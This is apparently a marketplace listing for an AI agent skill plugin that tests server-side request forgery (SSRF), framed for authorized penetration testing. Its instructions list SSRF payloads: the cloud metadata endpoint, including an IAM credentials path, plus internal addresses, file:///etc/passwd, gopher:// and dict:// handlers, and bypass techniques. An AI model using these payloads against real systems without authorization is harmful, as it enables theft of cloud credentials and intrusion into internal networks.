Skill

performing-ssrf-vulnerability-exploitation

Tests SSRF vulnerabilities by probing AWS/GCP/Azure metadata endpoints, internal HTTP port scanning, protocol handlers, and bypasses like DNS rebinding via user-controllable URLs.

Python

AWS

npx claudepluginhub mukul975/anthropic-cybersecurity-skills --plugin cybersecurity-skills

Tool Access

This skill uses the workspace's default tool permissions.

Preview

- When conducting security assessments that involve performing ssrf vulnerability exploitation

Supporting Assets

LICENSEreferences/api-reference.mdscripts/agent.py

SKILL.md

Similar Skills

applying-brand-guidelines

41.6k

Applies Acme Corporation brand guidelines including colors, fonts, layouts, and messaging to generated PowerPoint, Excel, and PDF documents.

3 files

anthropics-claude-cookbooks

creating-financial-models

41.6k

Builds DCF models with sensitivity analysis, Monte Carlo simulations, and scenario planning for investment valuation and risk assessment.

2 files

anthropics-claude-cookbooks

analyzing-financial-statements

41.6k

Calculates profitability (ROE, margins), liquidity (current ratio), leverage, efficiency, and valuation (P/E, EV/EBITDA) ratios from financial statements in CSV, JSON, text, or Excel for investment analysis.

2 files

anthropics-claude-cookbooks

Stats

Stars5748

Forks783

Last CommitApr 6, 2026

Actions

View Source View Plugin View on GitHub View README

When to Use

When conducting security assessments that involve performing ssrf vulnerability exploitation
When following incident response procedures for related security events
When performing scheduled security testing or auditing activities
When validating security controls through hands-on testing

Prerequisites

Familiarity with security operations concepts and tools
Access to a test or lab environment for safe execution
Python 3.8+ with required dependencies installed
Appropriate authorization for any testing activities

Instructions

Install dependencies: pip install requests
Identify URL parameters in the target application that accept URLs or hostnames.
Test SSRF payloads:
- Cloud metadata: http://169.254.169.254/latest/meta-data/
- Internal services: http://127.0.0.1:port/, http://10.0.0.1/
- Protocol handlers: file:///etc/passwd, gopher://, dict://
- Bypass techniques: IP encoding, DNS rebinding, URL redirects
Analyze responses for information disclosure or internal access confirmation.
Generate a vulnerability assessment report.

# For authorized penetration testing and lab environments only
python scripts/agent.py --target-url https://app.example.com/fetch?url= --output ssrf_report.json

Examples

AWS Metadata SSRF

GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

If the response contains AWS credentials (AccessKeyId, SecretAccessKey), SSRF is confirmed with critical impact.